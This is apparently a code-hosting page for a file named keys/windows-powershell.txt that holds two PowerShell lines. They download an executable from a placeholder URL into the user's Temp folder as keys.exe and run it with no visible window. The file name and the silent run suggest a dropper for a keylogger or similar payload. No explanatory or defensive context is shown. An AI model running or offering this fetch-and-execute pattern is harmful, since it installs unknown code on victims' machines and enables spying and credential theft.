keys/windows-powershell.txt
2025-03-24 12:31:48 +01:00

3 lines
128 B
Plaintext

Invoke-WebRequest URL -OutFile .\AppData\Local\Temp\keys.exe
Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow